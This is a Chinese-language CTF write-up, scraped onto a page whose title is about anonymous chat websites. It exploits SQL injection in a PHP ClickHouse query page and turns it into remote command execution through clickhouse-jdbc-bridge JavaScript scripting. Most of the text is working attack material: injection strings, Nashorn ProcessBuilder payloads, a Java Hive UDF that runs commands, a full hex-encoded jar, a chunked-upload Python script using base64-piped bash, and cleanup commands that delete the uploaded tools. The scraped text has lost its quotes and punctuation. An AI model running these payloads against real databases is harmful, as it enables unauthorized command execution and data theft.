当前位置：首页 > news >正文

网站可以做匿名聊天吗网站正在建设中mp4

news 2026/4/22 1:04:32

网站可以做匿名聊天吗,网站正在建设中mp4,做网站流量赚钱,品牌网站建设流程前置知识 ClickHouse#xff1a;是一个开源的列式数据库管理系统 clickhouse-jdbc-bridge#xff1a;clickhouse数据库和jdbc交互的工具 HDFS#xff08;Hadoop Distributed File System#xff09;#xff1a;专为大数据存储和处理而设计。审计 ?php error_re…前置知识 ClickHouse是一个开源的列式数据库管理系统 clickhouse-jdbc-bridgeclickhouse数据库和jdbc交互的工具 HDFSHadoop Distributed File System专为大数据存储和处理而设计。审计 ?php error_reporting(E_ALL ^ E_DEPRECATED); require __DIR__ . /../vendor/autoload.php; if (!isset($_GET[query])) {show_source(__FILE__);exit; } $config [host clickhouse,port 8123,username default,password ]; $db new ClickHouseDB\Client($config); $db-database(default); $db-setTimeout(1.5); $db-setTimeout(10); $db-setConnectTimeOut(5); $db-ping(true); $statement $db-select(SELECT * FROM u_data WHERE . $_GET[query] . LIMIT 10); echo (json_encode($statement-rows()));// Err Uncaught ClickHouseDB\Exception\DatabaseException: connect to hive metastore: thrift or // Err NoSuchObjectException(messagehive.default.u_data table not found), // please wait for 1min, hive is not initialized.这是一个提供数据库查询的php代码不过里面泄露了clickhouse 数据库管理系统的配置信息并且第20处存在sql注入根据官方文档https://github.com/ClickHouse/clickhouse-jdbc-bridge/blob/v2.1.0/README.md#usage 其中的clickhouse-jdbc-bridge允许执行sql语句脚本文件以及js代码等等 -- adhoc query select * from jdbc(ch-server, system, select * from query_log where user ! default) select * from jdbc(ch-server, select * from query_log where user ! default) select * from jdbc(ch-server, select * from system.query_log where user ! default)-- table query select * from jdbc(ch-server, system, query_log) select * from jdbc(ch-server, query_log)-- saved query select * from jdbc(ch-server, scripts/show-query-logs.sql)-- named query select * from jdbc(ch-server, show-query-logs)-- scripting select * from jdbc(script, [1,2,3]) select * from jdbc(script, js, [1,2,3]) select * from jdbc(script, scripts/one-two-three.js)其中在 Java 8 开始引入的 JavaScript 引擎Nashorn。Nashorn支持在Java应用中处理脚本可以用JavaScript语法来编写代码。所以我们可以利用Java中的Runtime类来执行系统命令。构造sql注入语句,执行rce 10 UNION ALL SELECT results, , , FROM jdbc(script:, java.lang.Runtime.getRuntime().exec(ls))构造js代码回显数据 #创建ProcessBuilder 实例用于执行系统命令 var a new java.lang.ProcessBuilder(/readflag);#获取启动的进程 b a.start();#获取标准输出流 c b.getInputStream();#构建StringBuilder实例用于回显字符串 sb new java.lang.StringBuilder();#循环遍历输入流并将结果添加到实例sb中 d 0; while ((d c.read()) ! -1) {sb.append(String.fromCharCode(d)); }#关闭输入流释放资源 c.close();# 打印输出 sb.toString();然后构造sql语句回显数据 10 UNION ALL SELECT results, , , FROM jdbc(script, var anew java.lang.ProcessBuilder(/readflag),ba.start(),cb.getInputStream(),sbnew java.lang.StringBuilder(),d0;while ((dc.read())!-1){sb.append(String.fromCharCode(d))};c.close();sb.toString())这里我们就拿到的第一段flag。第二个部分的flag在hive的机器里根据hive的官方文档https://cwiki.apache.org/confluence/display/Hive/LanguageManualDDL#LanguageManualDDL-CreateFunction CREATE FUNCTION [db_name.]function_name AS class_name[USING JAR|FILE|ARCHIVE file_uri [, JAR|FILE|ARCHIVE file_uri] ];允许通过上传文件的方式构造用户自定义函数我们开始编写自定义函数进行rce打包为jar包 package udf; import org.apache.hadoop.hive.ql.exec.UDF; import org.apache.hadoop.io.Text; import java.io.*; import java.lang.*;public final class Exec extends UDF {public Text evaluate(final Text s) {if (s null) { return null; }try {String result ;String command s.toString();Process p Runtime.getRuntime().exec(command);BufferedReader in new BufferedReader(new InputStreamReader(p.getInputStream()));String inputLine;while ((inputLine in.readLine()) ! null) {result inputLine \n;}in.close();return new Text(result);} catch (IOException e) {return new Text(e.toString());}} }将构造好的jar包进行16进制转储 504B0304140008080800908A1457000000000000000000000000090004004D4554412D494E462FFECA00000300504B0708000000000200000000000000504B0304140008080800908A1457000000000000000000000000140000004D4554412D494E462F4D414E49464553542E4D46F34DCCCB4C4B2D2ED10D4B2D2ACECCCFB35230D433E0E5722E4A4D2C494DD175AA040958E819C41B19182968F8172526E7A42A38E71715E417259600D56BF272F1720100504B07084DCD370F4400000045000000504B03040A0000080000E0891457000000000000000000000000040000007564662F504B03041400080808008F8A14570000000000000000000000000E0000007564662F457865632E636C6173738554DB521341103D13929DB02C04C235DE50144820B082281810919BA209580429F3E6920C6135ECC6B04BF147BEE24B62992A1FB5CA6FF01BFC024BEC59AE01D4247576A64F9FEE9E9EDE7CFFFDF90B8031ACA8E8447F10511561C4540C6050429C63886358858EBB2A384654281895708F634C85867E09F78378209F31C98C734CC8280F39122ADA10E398E4986250A64CCB74A619EAA2B17506FF9C9D130CA1A4698965777B4394D68C8D02598262D728B88643CB8968D22EE575A36864B784BE65E46CBBA89BB6BE26F69CC9D83F3886C6B46364DFA58CA217D5AB6182E311C7B477A604839AB6DD52562C9A3269FDC29EC80EBF35760D0D5D8830D0711E6386E3898659CC6998C702438774904966DDCD4D5112B95561E4448921724C2C5945D7493B25616C1F729450C3229ECAB0CF242C69788E19864E4F5230ACBC4EFEA6959F75CD020934BC409281A91A52B290C85F4F29A32D33B49EE45E59D8CB8AA263DA1675D1CD6DEAF2500C3D17236C99BB427F5FD00539E8AFE617199ACF97C3D0726A7A59B2B3626787C23AF631DD168D25CF8B266B54ABAEE598DBD45D352F9C934D7B8DEEC84C42BFF0AAED8F5E8C7A5670540A099A28EA997E534B8F23D75E04B976452F25E41CB69E528737E65983C4E7E468D2DC1AC5A2B0720C43FFA9ACE61A2969205BB077BC035FA25BC7083AE8A5931F1F981C3AC22BB4BB4E4F9A3F04062A601F69C1709550F18C9CF09AE7225D7F224016C01AFC8600DB0FFB528365D42D7F827FA88C40C25F8592A9826722FE328215D457A026029140190D9984F215DD5568990A1AE365344514827088A08CE6D487831FD2ADA58A70265E41EB7ECA5B95D12E37945DC11B18F476FBBCDA86D140584F568DB0114DF4ED440871B4609CFE0BD2E4F91AEDA4E8C0063137C87B147EE500BD5038BA396E72DCF27E3D1CB7815FE8A3DD0185F21DD2601C77286FAFD7AEBE3F504B07083D09D2E8BA020000B9040000504B03041400080808008A8A14570000000000000000000000000D0000007564662F457865632E6A6176617D51C14EC3300CBDF72BCC4E2993F203532F88214D42020DB87131A9DB06D224A4C93684FAEF245DD795219143E43CBFF7ECD816C507D604A1AC56996CAD711E8CAB395A140DF1064B632C6FE48EF8A7E27420C15F6EEFFEA14AC39FE9E027C63BEE3081D7BF1185BA4E186436BC2929A0921A1508855D07EB5806A209E9B283580EBE33809197CC8176A8027A6247D58075F940039015B00E8A0274502A82E0C807A787E70AFA81E3DD170CC15192CE937752D791DC05E5A180C562759913A66D519731D9716F8E20CBCFB4476704C5FE6D646C83F6B2255E931F43960FF363A3CB4C7713AA8A1C955BC2921C481DF59AF617384BD046DBE06365C276446D2A3183599EE77F3A97297F2F359D33FB462A02C6A6542C2A358F16657A451BB89A6638A9D21947B42CCEB6B084C5AB9E4DAC9FA2E82994E9683EA8D346E287D2EED8D17124F420D08B06D8E6617D1064BD341A68DEC4A59C66DB38996459BAFA1F504B0708F7E1F46D60010000E0020000504B01021400140008080800908A14570000000002000000000000000900040000000000000000000000000000004D4554412D494E462FFECA0000504B01021400140008080800908A14574DCD370F440000004500000014000000000000000000000000003D0000004D4554412D494E462F4D414E49464553542E4D46504B01020A000A0000080000E08914570000000000000000000000000400000000000000000000000000C30000007564662F504B010214001400080808008F8A14573D09D2E8BA020000B90400000E00000000000000000000000000E50000007564662F457865632E636C617373504B010214001400080808008A8A1457F7E1F46D60010000E00200000D00000000000000000000000000DB0300007564662F457865632E6A617661504B0506000000000500050026010000760500000000我们可以利用ClickHouse数据库操作HDFS这里我们通过连接到clickhouse数据库执行sql命令上传jar包jar包的存放路径为HDFS根目录下的a.jar 10 UNION ALL SELECT results, , , FROM jdbc(jdbc:clickhouse://127.0.0.1:8123, CREATE TABLE hdfs_test (name String) ENGINEHDFS(\hdfs://namenode:8020/a.jar\, \Native\);)然后将数据上传至hdfs:///a.jar\ jdbc(jdbc:clickhouse://127.0.0.1:8123, INSERT INTO hdfs_test SETTINGS hdfs_create_new_file_on_insertTRUE VALUES (unhex(\504B0304140008080800908A1457000000000000000000000000090004004D4554412D494E462FFECA00000300504B0708000000000200000000000000504B0304140008080800908A1457000000000000000000000000140000004D4554412D494E462F4D414E49464553542E4D46F34DCCCB4C4B2D2ED10D4B2D2ACECCCFB35230D433E0E5722E4A4D2C494DD175AA040958E819C41B19182968F8172526E7A42A38E71715E417259600D56BF272F1720100504B07084DCD370F4400000045000000504B03040A0000080000E0891457000000000000000000000000040000007564662F504B03041400080808008F8A14570000000000000000000000000E0000007564662F457865632E636C6173738554DB521341103D13929DB02C04C235DE50144820B082281810919BA209580429F3E6920C6135ECC6B04BF147BEE24B62992A1FB5CA6FF01BFC024BEC59AE01D4247576A64F9FEE9E9EDE7CFFFDF90B8031ACA8E8447F10511561C4540C6050429C63886358858EBB2A384654281895708F634C85867E09F78378209F31C98C734CC8280F39122ADA10E398E4986250A64CCB74A619EAA2B17506FF9C9D130CA1A4698965777B4394D68C8D02598262D728B88643CB8968D22EE575A36864B784BE65E46CBBA89BB6BE26F69CC9D83F3886C6B46364DFA58CA217D5AB6182E311C7B477A604839AB6DD52562C9A3269FDC29EC80EBF35760D0D5D8830D0711E6386E3898659CC6998C702438774904966DDCD4D5112B95561E4448921724C2C5945D7493B25616C1F729450C3229ECAB0CF242C69788E19864E4F5230ACBC4EFEA6959F75CD020934BC409281A91A52B290C85F4F29A32D33B49EE45E59D8CB8AA263DA1675D1CD6DEAF2500C3D17236C99BB427F5FD00539E8AFE617199ACF97C3D0726A7A59B2B3626787C23AF631DD168D25CF8B266B54ABAEE598DBD45D352F9C934D7B8DEEC84C42BFF0AAED8F5E8C7A5670540A099A28EA997E534B8F23D75E04B976452F25E41CB69E528737E65983C4E7E468D2DC1AC5A2B0720C43FFA9ACE61A2969205BB077BC035FA25BC7083AE8A5931F1F981C3AC22BB4BB4E4F9A3F04062A601F69C1709550F18C9CF09AE7225D7F224016C01AFC8600DB0FFB528365D42D7F827FA88C40C25F8592A9826722FE328215D457A026029140190D9984F215DD5568990A1AE365344514827088A08CE6D487831FD2ADA58A70265E41EB7ECA5B95D12E37945DC11B18F476FBBCDA86D140584F568DB0114DF4ED440871B4609CFE0BD2E4F91AEDA4E8C0063137C87B147EE500BD5038BA396E72DCF27E3D1CB7815FE8A3DD0185F21DD2601C77286FAFD7AEBE3F504B07083D09D2E8BA020000B9040000504B03041400080808008A8A14570000000000000000000000000D0000007564662F457865632E6A6176617D51C14EC3300CBDF72BCC4E2993F203532F88214D42020DB87131A9DB06D224A4C93684FAEF245DD795219143E43CBFF7ECD816C507D604A1AC56996CAD711E8CAB395A140DF1064B632C6FE48EF8A7E27420C15F6EEFFEA14AC39FE9E027C63BEE3081D7BF1185BA4E186436BC2929A0921A1508855D07EB5806A209E9B283580EBE33809197CC8176A8027A6247D58075F940039015B00E8A0274502A82E0C807A787E70AFA81E3DD170CC15192CE937752D791DC05E5A180C562759913A66D519731D9716F8E20CBCFB4476704C5FE6D646C83F6B2255E931F43960FF363A3CB4C7713AA8A1C955BC2921C481DF59AF617384BD046DBE06365C276446D2A3183599EE77F3A97297F2F359D33FB462A02C6A6542C2A358F16657A451BB89A6638A9D21947B42CCEB6B084C5AB9E4DAC9FA2E82994E9683EA8D346E287D2EED8D17124F420D08B06D8E6617D1064BD341A68DEC4A59C66DB38996459BAFA1F504B0708F7E1F46D60010000E0020000504B01021400140008080800908A14570000000002000000000000000900040000000000000000000000000000004D4554412D494E462FFECA0000504B01021400140008080800908A14574DCD370F440000004500000014000000000000000000000000003D0000004D4554412D494E462F4D414E49464553542E4D46504B01020A000A0000080000E08914570000000000000000000000000400000000000000000000000000C30000007564662F504B010214001400080808008F8A14573D09D2E8BA020000B90400000E00000000000000000000000000E50000007564662F457865632E636C617373504B010214001400080808008A8A1457F7E1F46D60010000E00200000D00000000000000000000000000DB0300007564662F457865632E6A617661504B0506000000000500050026010000760500000000\)))但是由于click house不支持Thrift协议所以出题人利用 GolangUPX 编写了一个简易的hive客户端然后我们可以编写分时上传客户端程序并进行拼接 package mainimport (contextgithub.com/beltran/gohivelogos )func main() {conf : gohive.NewConnectConfiguration()conf.Username root // username maybe emptyconnection, errConn : gohive.Connect(hive, 10000, NONE, conf)if errConn ! nil {log.Fatalln(errConn)}defer connection.Close()cursor : connection.Cursor()ctx : context.Background()cursor.Exec(ctx, os.Args[1])if cursor.Err ! nil {log.Fatalln(cursor.Err)}defer cursor.Close()var s stringfor cursor.HasMore(ctx) {cursor.FetchOne(ctx, s)if cursor.Err ! nil {log.Fatalln(cursor.Err)}log.Println(s)} }#!/bin/bash # build in golang:1.21.3-bullseye go build -a -gcflagsall-l -B -wbfalse -ldflags -s -w upx --brute --best clickhouse-to-hive python分时上传脚本 import requestsdef query(s):a requests.get(https://ip:port, params{query: 10 union all select results, 2, 3, 4 from s})text a.texttry:return json.loads(text)[0][userid]except:return a.textdef rce_in_clickhouse(c):sql jdbc(script:, var anew java.lang.ProcessBuilder(\bash\,\-c\,\{{echo,{}}}|{{base64,-d}}|{{bash,-i}}\),ba.start(),cb.getInputStream(),sbnew java.lang.StringBuilder(),d0;while ((dc.read())!-1){{sb.append(String.fromCharCode(d))}};c.close();sb.toString()).format(base64.b64encode(c.encode(utf-8)).decode(utf-8))return query(sql)def upload():ch_to_hive open(./clickhouse-to-hive/clickhouse-to-hive, rb).read()ch_to_hive_parts [ch_to_hive[i:i4096] for i in range(0, len(ch_to_hive), 4096)]for i, r in enumerate(ch_to_hive_parts):# Cannot direct append because script will be executed twices base64.b64encode(r).decode(ascii)sql3 jdbc(script:, var fosJava.type(\java.io.FileOutputStream\);var fnew fos(\/tmp/ttt{}\);f.write(java.util.Base64.decoder.decode(\{}\));f.close();1).format(str(i), s)query(sql3)sql4 jdbc(script:, var FileJava.type(\java.io.File\);var fosJava.type(\java.io.FileOutputStream\);var fisJava.type(\java.io.FileInputStream\);var fnew fos(\/tmp/ch-to-hive\);for(var i0;i{};i){{var ffnew File(\/tmp/ttt\i.toString());var anew Array(ff.length()1).join(\1\).getBytes();var finew fis(ff);fi.read(a);fi.close();f.write(a);}}f.close();).format(str(len(ch_to_hive_parts)))query(sql4)rce_in_clickhouse(chmod x /tmp/ch-to-hive rm -rf /tmp/ttt*upload()最后通过此hive客户端加载自定义函数 10 UNION ALL SELECT results, , , FROM jdbc(script, var anew java.lang.ProcessBuilder(/tmp/ch-to-hive create function default.v as udf.Exec using jar hdfs:///a.jar),ba.start(),cb.getInputStream(),sbnew java.lang.StringBuilder(),d0;while ((dc.read())!-1){sb.append(String.fromCharCode(d))};c.close();sb.toString())读取/readflag数据 10 UNION ALL SELECT results, , , FROM jdbc(script, var anew java.lang.ProcessBuilder(/tmp/ch-to-hive SELECT default.v(/readflag)),ba.start(),cb.getInputStream(),sbnew java.lang.StringBuilder(),d0;while ((dc.read())!-1){sb.append(String.fromCharCode(d))};c.close();sb.toString())最后擦屁股删除上传的文件 10 UNION ALL SELECT results, , , FROM jdbc(script, var anew java.lang.ProcessBuilder(rm -rf /tmp/ch-to-hive),ba.start(),cb.getInputStream(),sbnew java.lang.StringBuilder(),d0;while ((dc.read())!-1){sb.append(String.fromCharCode(d))};c.close();sb.toString())

查看全文

http://www.hkea.cn/news/14361592/